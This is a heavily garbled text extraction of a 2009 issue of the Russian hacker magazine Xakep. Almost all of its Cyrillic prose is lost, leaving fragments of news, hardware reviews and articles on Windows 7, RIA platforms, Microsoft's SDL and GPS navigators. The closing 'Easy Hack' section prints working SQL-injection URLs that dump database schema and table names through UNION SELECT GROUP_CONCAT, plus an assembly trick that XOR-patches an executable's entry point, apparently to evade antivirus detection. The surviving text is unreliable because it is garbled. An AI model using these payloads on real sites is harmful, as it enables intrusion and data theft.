Вы находитесь на странице: 1из 148

WINDOWS

. 128

x 01()2009
2009

w w w.xakep.ru
01 (121) 2009

WindoWs 7/

. 96

. 20

121

PHP-
. 62

-

GPS-
. 36

WEB-
. 26

10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10.

, . -,
: 10 , -. ,
, ,
, ,
.
:).

P.S. X-party
.
.
nikitozz, . . X
udalite.livejournal.com

Content01(121)
004

MeGAnewS

092

-
CURL BUILDER C++

ferruM
016

096
102

wIndOwS, 7:

104

-
026

rIA-


\++

pc_ZOne
020

, ,
-

108

-
032

Sdl, MIcrOSOft

Syn/AcK


SECURITY DEVELOPMENT LIFECYCLE
036

112


GPS-


WAIK: WINDOWS

118


WIN2K8 WSUS 3.0 SP1

040

eASy hAcK

122
128


044

qIp

132

-
052

136

139

140

-tOOlS

072

078

x-Stuff

082

086


UBUNTU 8.10 KUBUNTU 8.10:

091

tIpS'n'trIcKS

142


070

8,5

PHP-
066

fAq unIted
FAQ

3D-
062

pSychO:


056

lIvecd:
LINUX


048

x-puZZle

144

www2
WEB-

032

048

092

128

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, XAKEP.PRO PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)

Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/dvd

>
Step
(step@real.xakep.ru)
> unix-
Ant
>

(komarov@gameland.ru)
>

/Art

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

/xakep.ru

>

(xa@real.xakep.ru)

>


(goryacheva@gameland.ru )
>

(olgaeml@gameland.ru)

(alekhina@gameland.ru)
(belov@gameland.ru)
>

(maksimova@gameland.ru)
>

(Strekneva@gameland.ru)

/publishing

>

(noah@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>pr-

(litvinovskaya@gameland.ru)

>


(andrey@gameland.ru)
>

(kosheleva@gameland.ru )

>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,


,

77-11802 14 2002 .

ScanWeb, .
100 000 .
.

.
:

. ,

,
.

.


.

.

>> meganews

Meganews

Mifrill
/ mifrill@real.xakep.ru /


Nokia ,
, , .
Nseries . N97
3.5" QWERTY-
. WiFi, Bluetooth, GPS, 5
Carl Zeiss, 32 16 (-

ASUS Eee PC

microSD-). -,
Flash-, , .
Nokia A-GPS
N97 , ,
(
).
2009 , 550 .

60% .


, ,

.
,
.
CD- DVD-. ,

. ,
,
.
. ,
,
100 ,

. ,
, , , ,
.

004

x 01 /121/ 09

>> meganews

Creative Commons.

100.000

Windows,

, . ,
, .
,
Microsoft Windows XP Microsoft Office
XP. , , , , ,
, . ,
: 117
. ,
. ,
, ,
, .

IE .

.

1.91%

, -
. 2009
1 .
, ,
.
,
, .
, ,
.
, ,
. , . ,
:).


,
, .
. TN Games, , , HTX Helmet,
. , FPS.
2009 ,
. , TN Games, ,
, , $200, .

006

x 01 /121/ 09

>> meganews
9 AOL ICQ- 5.1.

. , ,
- , . , , . ;-)

. ,
, :-), ;), :)
.
. , ,
Nestle , ,
. (,
) . -,
; -, , ,

, ,
. ,
- ,
.
, , .

2009 .

,
-
. ,
, ,
Windows. ,
-
250.000
. , , ,
. , ,
, , Microsoft

.
. ,
,
.
,
, . , ,
, , .

008

, , . .
, ,
, , Lingvo X3 ME, ABBYY
. ME Medved Edition,

. , IT-,
-
.

,
490 .
,

, ABBYY
,


.
x 01 /121/ 09

>> meganews
Windows
:

89.62%.

90%

,
.
(
), . ,

.
www.biletam.net .
,
(
),
. ,
! ,
. ,
27 . , .
, , ,
, ,

, .

-
?
,
,
,
. . Facebook
,
. Facebook

(Adam Guerbuez) .
, ,
. ,
$873 . Facebook 2008 $300 .
, Facebook 4
. -,
, ,
.
, ,
. Facebook ,
, .



Palm,
, ,
-
. , ,
;
, .

. , Palm Apple , ,

010

Palm
Nova. , Palm
Palm OS 5. Nova
, 2009
.
BlackBerry
iPhone, 2%
. ,
, App Store.
, .
, !
x 01 /121/ 09

>> meganews
1234567.

123456.

?
, Yahoo! ,
Microsoft.
, . Microsoft
$47.5 ., Yahoo! .
2008 Microsoft
, . ,
Yahoo! ( , 2008
), Yahoo! . , ,
, . ,
$20 . ,
Microsoft
AOL
Fox Interactive Media , , ,
. Microsoft .


, ,
,
. 1250
( ) 1
2008,
, .
:
. ,
,
, , .
, ,
,
.
,
. , ,
YouTube -,
, ,
,
.

512 SDD

, 10

,
. Toshiba
SSD- 64,
128, 256 512 . , 512
, 1.8".
2.5". MLC-, Toshiba 240 \
200 \ . ,
AES-.

, ,
2009.

012

x 01 /121/ 09

>> meganews

, EBay.

, , . , , ,
- . ,
, 0000.
,
.
, , . EBay ,
, , , .


Microsoft
, , .
. - Windows
7 , ,

. Device
Stage, Jump Lists.
Windows Advanced Rasterization Platform (WARP),
DirectX 10 10.1
.
Windows Live,
. Windows 7
,
Vista, 2010. -, , 2009. ,
.
, Vista - Service Pack 2.
, Vista
SP1. SP2
2009 . - , , ,
.

x 01 /121/ 09

013

>> meganews



,

, .
2008 $82 .
-
.

,
10.000. , ,
- (,
)
,
. ,
,
.
.
, - , . ,
Telstra,
,
. ,
. , ,
.
. ,
.

Google,
Google Chrome, . ,
, . Gmail - ( , )
: Gmail .
Chrome , -,
Opera. , , Opera , Chrome 0.71% 0.83%. ,
,

014

Firefox 3 Chrome. , ,
Gmail. IE , , . ,
7 , 7 (, Google
). , ,
: Internet Explorer, IE8,
-
: Firefox 3 Chrome. Chrome
Google Earth. !
x 01 /121/ 09

>> meganews

.

, , ,
, .

, , , .
,
, ? ,
,
Grippity. , QWERTY- . ,
() . ,
, . , Grippity , ,
, .
.
$100,
.

.
, , Abit
. Abit ,
2004 . -
. , -
,

Universal Scientific Industrial (USI). USI Abit
, ,
. Abit ,
, , . ,
. 1 2009 Abit .
x 12 /120/ 08

015

>> ferrum

! ,
- .
. .


, , . , ,
- -.
Skype
,
ICQ, Mail- yahoo-messenger. ,
, .
128
/. ,
. , 640480
.
, ,
. ,
,
. , smotri.com ,
.
, web. , .

016


.

.
. , ,
, . Skype ,
, .


Skype. , 10 /.
!
, .
Windows XP Professional SP3 .
.
, .
(
- -). ,
,
.

x 01 /121/ 09

>> ferrum

Creative Live!
Cam Notebook Ultra
:

: 1,3
:1280 x 1024
: 5 ( )
: 30 /
: USB 2.0

ST BUY

TORs

EDI

TO
s CHOICE

ST BUY

EDI

ICE

HO
BE

BEST BUY

BE

750 .

2300 .

Genius iSlim 321R


:

: 0,3
: 640 x 480
: 0,3 ( )
: 30 /
: USB 2.0

Creative, ,
. . , ,
.
: , ,
. -
- .

.
.
.
.

. :
, USB
.
( ).
. ,
.
x 01 /121/ 09

Genius
, - .
-
. .
(
).
,
. , ,
, . ,
. , .
,
, .
.
,
, . : ,
.

017

>> ferrum

Hercules Deluxe Optical Glass Hercules Dualpix Chat and Show

: 1,3
: 800 x 600
: 1,3 ( )
: 30 /
: USB 2.0

: 1,3
: 1280 x 1024
: 5 ( )
: 30 /
: USB 2.0

1400 .

2200 .


. , , , ,
. (
-) ,
, . , ,
.
.
. ,
- (
).
. , , ,
, .
.
.

018

. , , ,
- . .
- 2 .
,
USB. .
, , , , .
, -.
.
. ,
. ,
: , .

, , , . , ,
.
: , ,
.
x 01 /121/ 09

>> ferrum
ICE

EDI

TORs

s CHOICE

EDI

TO
R

HO

2300 .
4600 .

Logitech QuickCam Sphere AF


:

: 2
: 1600 x 1200
: 8 ( )
: 30 /
: USB 2.0

Microsoft LifeCam VX :

: 0,3
: 640 x 480
: 1,3 ( )
: 30 /
: USB 2.0

Logitech.
,
. -, Carl Zeiss
. -,
. -,

, . -,

.
, 26 . .
, ,
, ,
.
. ,

.

Microsoft .
: ,
(Russian edition?).
. ,
. ,
: .
, 0,3 .
, :
. :
,
.
,
. . : , , , .
: , (
640480).

,
100% . , web-, .
. Logitech
QuickCam Sphere AF. ,

.
, ( ), Creative
Live! Cam Notebook Ultra . Microsoft LifeCam
VX-5500 , .
! z

x 01 /121/ 09

019

>> pc_zone
sPider_Net
/ antonov.igor.khv@gmail.com /

WindoWs,
7:

Vista, Microsoft

Windows 7. !
2010 , preBeta- !

: blAcKcOMb
, Windows 7 Microsoft. , Windows XP
Vista . Windows 7
. ,

020

, , . Windows 7
Microsoft!
2000 . , , Microsoft
BlackComb
2005 , 2001
x 01 /121/ 09

>> pc_zone

Windows 7
, BlackComb
Windows LongHorn,
Vista. Blackcomb
Vienna. , , Windows 7
, !
, Microsoft
. ,
,
.
; , Vista. , . PreBeta- build 6801. Microsoft
PDC, -.
6933, 6801, .

x 01 /121/ 09

, , . .
6956, ,
. ,
,
.

UAC,
, , .

. Microsoft, ,
, - . ,
(, slow_work=on?),
: Windows 7 ! !
WordPad

021

>> pc_zone
(Super Bar)

TC

TC

info
Vista


.

, .

,
.


,

,


.

( Libraries),

.

.

,
.
,

.

ISE
UAC

.
Pentium
4 (
Vista 40-45
).
. Aero ,
,

. , .
(Visual Studio 2008, Delphi 2009 ..),
,

. : ,
?.
,
, Vista.
,
30 . :

Windows 7? !
, PreBeta,
.
:
Vista . ,
2-3 . ,
. ,
Asus eeeP .

. , . Windows 7 SuperBar
.
, ,
.

.
Windows Media Player


,

.

.

022

x 01 /121/ 09

>> pc_zone

Windows 7

,
Windows 7, . :
, , ,
, . ?
Windows 7
,
.
( ,
,
50% ;
) AeroSnap (www.aerosnap.de.vu).
, Winsplit Revolution (www.
winsplit-revolution.com).
UAC, , Vista .
, ,
Nortons User Account Control
(www.nortonlabs.com/inthelab/uac.php).
, , , , .
Life Rocks blog ,
, , wallpaper,
. : www.nirmaltv.
com/2008/11/07/transform-vista-to-windows-7.
Aero Peek,
, . ,
Visual
Task Tips (www.visualtasktips.com),
Taskix (taskix.robustit.com).

.
: ?
. ,
,
Windows.
.
.
Vista, ,
.
, ,
.
,
, ,
( ).
: -
.
Windows ,
. -:
Word
. , Microsoft SideBar, . ,
, -
.
x 01 /121/ 09


,
Microsoft : MS Paint, ,
WordPad .. Windows 95.
2010 Microsoft
. , MS Paint
ribbon; -
PNG.
WordPad , ,
MS Paint, . , -,
,
.
, Windows
Media Player. ,
, ,
:).

-
-, Microsoft
, *nix-.
, ,

023

>>

.
bat , CScript . 2006
MS PowerShell
, .NET Framework.
MS.
Windows 7 - .



6801 ,
Vista.
, . . , , . ,
:
1. ( ) Rafael.
2. Windows.
3.
:
> takeown /f %windir%\explorer.exe
> cacls %windir%\explorer.exe /E /G <>:F
> start unlockProtectedFeatures.exe

4. .

024


Windows . , Windows
Solution Center. , , .
UAC, , , . ,
.
Vista
User Account
Control, .
( API-, ,
), . Windows 7, , UAC
. , UAC
,
. ,
UAC ,
.

Outro by Step

, -,
- , , , ...
.
Vista . ,
Daemon Tools,
. . ,
,
. ,
:)
P.S. 14 . . z

x 01 /121/ 09

>> pc_zone

/ aleks.raiden@gmail.com /

RIA-
-

-
. - ,
. AJAX!
?
- RIA ()
- ,
: , .
,

( , ). ,
-
( ). ,
,
. ActiveX Microsoft Java-,
, ,
, . Flash ,
,
,
API,
. : - - , ,
, .

026

, ,
. ,
- (,
, , ) Google Chrome
,

. ,
,
.
, Mozilla Prism, Mozilla Firefox (,
).
, Safari . -,
, .


Flash-. Adobe AIR, Adobe (z, #111).
x 01 /121/ 09

>> pc_zone

dvd


RIA!

links
Silverlight 2
:
http://silverlight.net/
GetStarted/overview.
aspx.
BrowserPlus Yahoo -,

? ,
RIA-. RIA
Rich Internet Application ,
,
(
) . , ,
,
,
, HTML. RIA
, -

Doom !

x 01 /121/ 09


.
, ,
, ,
, ,
, . ,
-,
! :

: www.
silverlighter.ru, www.
silverlight.ru.
Unix
: www.
go-mono.com/
moonlight.

! - MS
Expression Studio 2
Microsoft:
expression.microsoft.
com.

027

>> pc_zone

info
Titanium (www.
titaniumapp.com)
,


- HTML/
CSS/JavaScript


, ,
- .

.

warning
Google
Gears Yahoo
BrowserPlus
,
Flash,
Silverlight JavaFX


.

Silverlight Microsoft

RIA- ! , ?

Google Gears Google


: gears.google.com
: Firefox, Internet Explorer
Safari, Android Windows Mobile
:
Google Docs docs.google.com
Google Reader reader.google.com

RememberTheMilk www.rememberthemilk.com
Zoho Writer zoho.com
- Wordpress
Google Chrome
Gears ,

AJAX-.
- . ,
Google Gears -

Flex

RIA
,


.

028

x 01 /121/ 09

>> pc_zone

Gears !

Google Gears

, AJAX- Gears ( , ). ,
Gears : ,
. ,
Google Gears: Dojo Toolkit jQuery ( jquery-offline,
http://code.google.com/p/jquery-offline); ExtJS
,
, .


, . ,
Google Docs, WiFi-, 20. ,
Gears. ,
, Google. , Gears,
, , Google Docs,
Wordpress. 2.6, -
Gears - .
,
. MySpace
,
( , Gears
, , ).
: Google Gears
? . API,
.
(-, SQL- , ), API , -, JavaScript-
. , , :
- ,
- . Google Gears
, , . , /
x 01 /121/ 09

( kernal32.dll, -),
!
URL
-
.
:
Google Gears . ,
gears.google.com .
Google Chrome ,
. -, Google Gears
Adobe Flash, .

Yahoo! Browser Plus Yahoo


: browserplus.yahoo.com
: Firefox, IE 6/7,Safari, Chrome,
Mac PC
: Yahoo!, Flickr
Yahoo! Browser Plus , - ( JavaScript).
Google Gears,
, : !. Gears,
BrowserPlus
. :
, drag-n-drop,
-,
.
ImageMagic ,
Photoshop Express Adobe
MS Paint. ,
Ruby,
, (
Gears, , ,
) Text-to-Speech (,
, ). :
, , . ,
, : ,
- .

Microsoft Silverlight/Moonlight
: microsoft.com/silverlight/
: Firefox, IE 6/7, Safari, Mac, PC

029

>> pc_zone

Silverlight , ImageCup

Linux/Unix
:
Microsoft
NBA
iStreamPlanet
- sky.com
Flash- ,
Microsoft, , ( , , )
.NET Framework,
-. MS
Silverlight, , Mono,
Linux/Unix Moonlight,
. , ,
Gears BrowserPLus. Silverlight ,
.NET. ( HD-, DRM-,
- - VC-1, WMV, WMA, MP3),
( C#,
.NET-),
XML , .
DHTML JavaScript, ,
,
Silverlight -, ,
. API
XMLHTTPRequest,
AJAX-: ,

(, AJAX- server-push Comet
). , . Silverlight
,
- JavaScript API, ,
.NET. ,
Microsoft
, -,
Silverlight 2, ! , ,

030

Quake

Native Client (http://code.google.com/p/nativeclient)
Google,
x86 ! ,

, !
Linux
! , Quake . , ,
:
1. Native Client (http://code.google.com/p/
nativeclient);
2. Google Chrome Firefox http://projects.
cocaman.net/quake/quake.html.

Windows, Mac,
Linux.

Adobe Flash/Flex
: http://www.adobe.com/products
: Firefox, IE 6/7, Safari, Mac, PC
Linux/Unix
:
Adobe
www.orbismap.com
eBay
Google Analytics
Flex- http://wiki.flash-ripper.com/
?title=_Flex-
Flash , , .
, RIA- Adobe Flex. Flash, x 01 /121/ 09

>> pc_zone

. , !

Sun, Java JavaFX.


RIA-,
FxScript.
JRE (, Silverlight
Flash), , -,
, . , Java
,
JavaFX. , , Sun
java-...
: http://www.javafx.com/about/overview

,
, MXML,
,
GUI-. , Flash Adobe
. 10
-. , Silverlight,
,
-, HD,
Adobe Pixel Blender!
. , , Flash . , FarCry Crysis
, Quake/Doom ! Adobe Alchemy
-. , ,
, ++.
++
x 01 /121/ 09

( ,
,
, ). C++ , ,
3D-, ,
,
3D DirectX OpenGL!
,
( , http://alternativaplatform.
com/ru), ,
. Doom ?
www.newgrounds.com/portal/view/470460.

?
.
- (, ) .
JavaScript, ,
, -. ,
, !.
, , .NET Microsoft.
- Silverlight
Adobe Flash/Flex/Alchemy,
, (C# .NET
Framework Silverlight 2, ++ Alchemy)
. ,
JavaScript ,
.
, IDE ( , ,
- ?).
,
RIA- , ,
, , , , .
: -,
, ? , , ? :)z

031

>> pc_zone


,
1999 ,


.

,
Windows,


.

SDL,

Microsoft
Security Development Lifecycle

2003 , 1.500.000 ,
3.370.000 ,
RPCSS.
, ,
Senior Development Lead Microsoft.
Microsoft
BlackHat, ,
. .
Microsoft , , . :
50000 , Microsoft,
. !
,
,
. ,
, SDL Security Development Lifecycle.

SDL
.
, SDL -

032

SEC(R)2008,
. .
SDL
. , , best practices ,
,
. : ,
, , . SDL ,
: , , , , ,
, . , SDL
- ,
. ,
( ).
, , .
, , ,
x 01 /121/ 09

>> pc_zone


, , , Blaster,
:
WCHAR wszMachineName[N+1] {

WCHAR wszMachineName[N + 1];


LPSTR pwszServerName = wszMachineName;

while (*pwszPath != L\\)

*pwszServerName++ = *pwszPath++;
}

pwszPath,
wszMachineName.
FxCop managed-

, !
, , , SDL
: Microsoft .
.
:
, !
.
Microsoft Security Response Center,
. , , , - ,
, , RPC, ,
SDL, .
- ,
( ) , , . , ,
. , , (), ,
,
. ,
SDL .

?
: SDL
? ,

, :). SDL Optimization Model,


, , ,
SDL . ,
SDL (
), , , .
C/++ /GS (
), /SAFESEH
(/SafeSEH) SDL.
. Best Pratices
/NXCompat,
(DEP) (/NXCompat).
,
PREfast, FxCop, Application Verifier.
PREfast Visual Studio ( 2005) /analyze. ,

_alloca, :
char *b;
do {

b = (char*)_alloca(9)
} while(1)

- ,
Visual Studio, FxCop

SDL

x 01 /121/ 09

033

>> pc_zone

SDL Threat Modeling Tool

info
Microsoft

SDL (,


3.2, MS
4.0).
SDL

,



.

dvd
DVD
.

034

,
.NET
Framework ( , ).
, .
Application Verifier unmanaged-.
,
. AppVerif
,
, .
,
API, .
Visual Studio. IDE ,
, , strcpy. :
void func(char *p) {
char d[20];
strcpy(d,p);
// etc
}

*p ,
.
strcpy ,

( ). Visual C++
stdafx.h
:

#define _CRT_SECURE_CPP_OVERLOAD_STANDARD_
NAMES 1

,
:
void func(char *p) {
char d[20];
strcpy_s(d,__countof(d), p);
// etc
}

,
SDL.
.
, . SDL
, , , .



. ,
Microsoft SDL,
, SDL.
,

.
, ,
.
,

x 01 /121/ 09

>> pc_zone

Visual Studio 2005, PREfast


Visual Studio /Analyse
. SDL Threat Modeling Tool
Microsoft, , ,
Visio.
, ? ! ,
(),
,
.
.
.
,
. , , , .
, :
1. ?
:
.

2. ?

3. ?
!

,
,
.
,
. SDL Threat Modeling Tool
, ,
. , .

MS , ,
, , .
, . ,
,
: API .
, , , (
).
. -,
. , , -
- . , Word
doc-, JPEG.
JPEG , , , , , .
-, .
,
Word : doc, . . x 01 /121/ 09

SDL
, SDL , , ,
.
SDL,
, , .
Microsoft
Microsoft Source Code Analyzer for SQL Injection XSS Detect Beta.
Visual Studio
XSS- -.
XSS ,
: RATSRough Auditing Tool for
Security (http://www.fortify.com/security-resources/rats.jsp)
ProxMon (http://www.fortify.com/security-resources/rats.jsp).

:
Microsoft Anti-Cross Site Scripting Library V1.5 for .NET applications
AntiXSS for Java (http://www.gdssecurity.co)
:
SiteLock ActiveX . Best Practices,
;
Banned.h -,
,
SDL.

, , . ,
, ,
, Man-in-the-middle .
:
1. (dumb) .

.
2. (smart) .
, , JPEG -
- . , , .
, .
? .
,
NDA. :
, Microsoft,
Peach ( , http://peachfuzzer.com).
, peach pits (
) ,
. :
, RPC, COM/DCOM, SQL- .
:
FileFuzz, Fuzzing Software (http://www.
fuzzing.org/fuzzing-software);
File Fuzzers, Fuzzbox, Windows IPC Fuzzing Tools, Forensic Fuzzing
Tools iSEC Partners (www.isecpartners.co).

SDL?
! , .
: -
! z

035

>> pc_zone


GPS-

GPS-. , : , - .
. -
, !

GPS-
Windows Mobile. .
,
GPS-!
,
,
, , .
POI, (, , , ,
.., ..). ,
.
, ,

036

,
, , .
, . ,
, .
, , GPS-
, .
, . , ,
-
, .
, ,
. , GPS- , - . ,
x 01 /121/ 09

>> pc_zone

navitel.ru
, .

, ,
.

3.2

iGO 8

3.2

autosputnik.com
2007,
.
Tele Atlas,
. OnLine
POI ( ,
, , ..)
.

iGO
i-go.com/ru
,
.
,
, .

TomTom
www.tomtom.com
TomTom , .
. embedded-, ,
.
TomTom Navigator

,
. ,
GPS ,
, !

Embedded-
( , , , ),
? , , ,
: GPS-,
. :
.
,
. ,
. .
user-friendly ,
.
, , ,
- ( ). ! Windows,
x 01 /121/ 09

Garmin Mobile XT
www.garmin.ru
Nokia, Windows,
WinCE. , .

, , . ,
? .



GPS, Voxtel ,
( ) Voxtel Carrera X433. , GPS-, .
, . ,

037

>> pc_zone

WinCE
-
, , ,
.
.
Visual Studio. Visual Studio ( Express) Windows CE/ Windows
Mobile
, , .

Platform Builder. ,
, , .
,
- . SDK, Platform Builder.
(SuperH, x86, MIPS,
ARM).
Embedded Visual C++ (eVC). Visual C++
embedded- Windows CE.

GPS-

System Information

links


100%

gpspassion.
com,
gps-club.ru 4pda.ru.

info

.

512 ( ),
fat16
.

,
,

off on. . ,
.
,
, 10-15.
,
, ,
.

038

Garmin Mobile XT

, -
,
Windows CE (WinCE). Windows ,

.
,
,
. ,
Windows CE
32 ,
.
Mio Menu
GWES-
5 .

, - Windows,

: , - , ..
( ), GPS- www.gps-club.
.
ru 4pda.ru,

Embedded-,
, .
PND-.
, ( , SD-
PND PNA ),
shell.ini :

GPS-\windows\explorer.exe
, BT-,
//.
card-,
,
ActiveSync Microsoft
(
, , ). ,
(, USB
x 01 /121/ 09

>> pc_zone

GPS-: WindowsCE

).
explorer.exe (
). !
, -.
, ,
, .
Audio, Music, Video Navitel,
.
3.2, , , .
Navitel.exe , -
GPS-. ? , ,
, , iGo
Igo.exe Navitel.exe. (
)!
exe- -.
navitel.exe
explorer.exe. ,
,
. , ,
, ceDesktop.exe,
.
Navitel.exe, ,
:).
, ,
Windows CE 5.0.
, ( Windows
Explorer), ,
(\DataStorage\CentralAP.exe), CONF.ini. .
, , iGo
GPS, :
GPSPath= \User\Navitel\Navitel.exe

, ,
iGO8 :). ,

( ) ,
,
. , x 01 /121/ 09

,
Windows CE, , , , ,
,
. ,
:
1. PNA;
2. ,
( , ..);
3.
Mobilenavigator, exe- mobilenavigator.exe;
4. .
Voxtel Carrera
,
.

TotalComander
WinCE.
? !


? , ,
Visual Studio ( ). , ,
,
.
Voxtel,
, .
, .
, . !
MioPocket 2.0 (http://www.gpspassion.com/forumsen/topic.
asp?TOPIC_ID=109690)
Mio,
. ,
.
,
, , ,
MS Office, ,
.. ,
. :
( )
System Infomation (http://
gpstacho.bettersoft.de).
, , , . :
,
? , : , .
,
Registry Workshop.
! z

039

>>

Easy Hack}
R0id Cr@wler
/ r0id@mail.ru /

Dot.err

/ crawlerhack@rambler.ru / / kaifoflife@bk.ru /

:
sql- MySQL
:
, SQL- - . , ,
- .
, LIMIT, ,
, .
, , .
GROUP_CONCAT() MySQL => 4.1 .
(
concat(), ). , GROUP_CONCAT()
, - . ,
1
(aka 1024 ),
group_concat_max_len. , , . , GROUP_CONCAT():
1. .
2. , DISTINCT,
ORDER BY, ASC/DESC.
3. LIMIT.
4. 1024
( ).
GROUP_CONCAT() MySQL =>
5 .
1. , sql- :
http://www.hacked.com/index.php?id=-1

: , , ,
:
,
. , , : PE- ,
(
), .

040

GROUP_CONCAT()

2. ( , <= 1024 )
:
http://www.hacked.com/index.php?id=1+UNION+SELECT+GROUP_CONCAT(SCHEMA_NAME SEPARATOR
0?0a)+FROM+information_schema.SCHEMATA/*

3. ( ,
<= 1024 ) :
http://www.hacked.com/index.php?id=1+UNION+SELECT+GROUP_CONCAT(TABLE_NAME SEPARATOR
0?0a)+FROM+information_schema.TABLES/*

, , Raz0r: http://raz0r.name/obzory/
group_concat.
:).

:
[ ] > [ (
)] > [ JMP,
] > [
PUSH 0
]
. , , (00401000) PUSH 0. 6A 00.
x 01 /121/ 09

>>
,
00401026. :
jmp 00401026, ( ) EB 24. ,
,
EB 24 6A 00. XOR ( ,
, ).
EB24 6A00, XOR
X: EB24 XOR X = 6A00. X : X = 6A00 XOR EB24, X = 8124.
, ; XOR 2481.
, :
1. OllyDBG PUSH 0,
00401000, jmp 00401026,
EB24.
2. 00401026, , :

00401026 MOV EAX, 00401000


; EAX

0040102B MOV EBX, [EAX]
; EBX
0040102D XOR EBX,2481
; XOR
jmp 00401026 PUSH 0
00401033 MOV [EAX],EBX; ...
00401035 JMP 00401000 ; ...

3.
. !
. ,
: , , , ,
.

3
:
:

.
www.virustotal.com.
,

, www.virustotal.com
( , 1wmz ). :). . :
1. ///etc :
PHP5 cURL, set_time_limit();
.htaccess;
- (/etc);
2. ( ,
ChaaK) ;
3. 777 ./files;
4. index.php, :
